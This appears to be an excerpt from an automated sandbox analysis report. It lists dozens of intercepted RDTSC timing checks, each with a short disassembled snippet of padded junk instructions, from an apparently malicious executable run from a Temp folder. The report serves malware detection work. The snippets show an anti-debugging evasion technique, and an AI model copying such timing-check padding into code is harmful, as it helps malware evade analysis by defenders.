Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 9220CA second address: 9220CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 9220CE second address: 9220D4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 92563F second address: 925643 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 9251FE second address: 92521E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF8C4F2090h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jnc 00007FBF8C4F2086h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 92521E second address: 925224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 92A194 second address: 92A1A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FBF8C4F2086h 0x0000000d je 00007FBF8C4F2086h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 92A1A7 second address: 92A1AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 92A1AB second address: 92A1C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FBF8C4F2090h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 92A1C7 second address: 92A1CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 92A1CD second address: 92A1D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 9325DA second address: 9325EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF8C4F2A50h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 9325EE second address: 93261D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBF8C4F2086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007FBF8C4F2098h 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FBF8C4F2090h 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c je 00007FBF8C4F2086h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 93261D second address: 932630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FBF8C4F2A46h 0x0000000a popad 0x0000000b js 00007FBF8C4F2A48h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 9387DE second address: 9387E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 9387E2 second address: 9387FD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBF8C4F2A51h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 939040 second address: 939044 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 939044 second address: 93904C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 93904C second address: 939071 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FBF8C4F2086h 0x00000009 jnc 00007FBF8C4F2086h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 jg 00007FBF8C4F208Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 939071 second address: 939075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 939075 second address: 939095 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF8C4F2086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FBF8C4F2090h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 939095 second address: 939099 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 93E6FC second address: 93E72D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF8C4F2097h 0x00000009 jmp 00007FBF8C4F2095h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 93E418 second address: 93E41F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 941889 second address: 94188D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 94188D second address: 9418A4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jp 00007FBF8C4F2A46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007FBF8C4F2A52h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 9418A4 second address: 9418AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 9418AA second address: 9418AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 948B15 second address: 948B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF8C4F208Ah 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 95E353 second address: 95E357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 95FFB6 second address: 95FFC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FBF8C4F2086h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 95FFC2 second address: 95FFC8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 960127 second address: 960134 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBF8C4F2086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 97970B second address: 979710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 979710 second address: 979716 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 979716 second address: 97971A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 97971A second address: 97972A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FBF8C4F2086h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 97972A second address: 979748 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A4Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 979748 second address: 97976E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBF8C4F2086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007FBF8C4F2098h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 979C00 second address: 979C06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 979C06 second address: 979C0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 979E92 second address: 979EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FBF8C4F2A52h 0x0000000d jno 00007FBF8C4F2A46h 0x00000013 jno 00007FBF8C4F2A46h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 979EAE second address: 979EB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBF8C4F2086h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 9802A6 second address: 9802BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 97FE4D second address: 97FE53 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 97FE53 second address: 97FE5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 97FE5A second address: 97FE69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FBF8C4F2086h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 97FE69 second address: 97FE6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 981DF2 second address: 981E00 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBF8C4F2088h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 981E00 second address: 981E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBF8C4F2A46h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5030F15 second address: 5030F24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F208Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5030F24 second address: 5030F2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5060EE7 second address: 5060F00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBF8C4F2090h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50001B1 second address: 50001DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FBF8C4F2A57h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50001F7 second address: 50001FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50001FB second address: 5000201 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000201 second address: 5000207 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000207 second address: 500020B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 500020B second address: 500020F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 500020F second address: 500021E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 500021E second address: 5000224 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5020AC5 second address: 5020ACB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5020ACB second address: 5020AD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5020AD1 second address: 5020AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5020AD5 second address: 5020AD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5020AD9 second address: 5020B05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ax, di 0x0000000d pushad 0x0000000e mov al, dh 0x00000010 movzx eax, di 0x00000013 popad 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FBF8C4F2A4Fh 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 mov ah, A7h 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50206EE second address: 5020712 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2091h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBF8C4F208Ch 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5020712 second address: 502072A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov si, 909Dh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 502072A second address: 5020757 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2093h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBF8C4F2090h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5020757 second address: 5020766 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5020766 second address: 502077E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FBF8C4F208Ah 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50205EE second address: 5020634 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov edi, eax 0x0000000d popad 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov cl, bl 0x00000014 pushfd 0x00000015 jmp 00007FBF8C4F2A4Ah 0x0000001a and esi, 1D674558h 0x00000020 jmp 00007FBF8C4F2A4Bh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5020634 second address: 502064C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF8C4F2094h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 502037D second address: 50203A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 mov ecx, 2C7F8247h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov edx, 591EE76Ah 0x00000018 call 00007FBF8C4F2A4Bh 0x0000001d pop eax 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5030158 second address: 503015C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 503015C second address: 503016F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 503016F second address: 5030175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5030175 second address: 5030179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5030179 second address: 50301A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a call 00007FBF8C4F208Ah 0x0000000f pop eax 0x00000010 popad 0x00000011 mov dword ptr [esp], ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FBF8C4F2092h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50301A8 second address: 50301AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50301AE second address: 50301F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 pushfd 0x00000006 jmp 00007FBF8C4F2098h 0x0000000b xor ax, 7058h 0x00000010 jmp 00007FBF8C4F208Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FBF8C4F2095h 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50301F9 second address: 503021A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 81h 0x00000005 mov bx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d jmp 00007FBF8C4F2A50h 0x00000012 push eax 0x00000013 push edx 0x00000014 mov edi, esi 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5060DC2 second address: 5060E51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2099h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FBF8C4F208Dh 0x00000012 add ecx, 58D97FF6h 0x00000018 jmp 00007FBF8C4F2091h 0x0000001d popfd 0x0000001e mov edi, ecx 0x00000020 popad 0x00000021 pushfd 0x00000022 jmp 00007FBF8C4F208Ch 0x00000027 adc cl, 00000018h 0x0000002a jmp 00007FBF8C4F208Bh 0x0000002f popfd 0x00000030 popad 0x00000031 xchg eax, ebp 0x00000032 jmp 00007FBF8C4F2096h 0x00000037 mov ebp, esp 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c call 00007FBF8C4F208Ch 0x00000041 pop esi 0x00000042 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5060E51 second address: 5060EA0 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FBF8C4F2A4Bh 0x00000008 sub eax, 6A1DEB3Eh 0x0000000e jmp 00007FBF8C4F2A59h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov eax, 6D12BE87h 0x0000001b popad 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FBF8C4F2A54h 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5060EA0 second address: 5060EA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5060EA4 second address: 5060EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 504031A second address: 5040320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5040320 second address: 504032A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
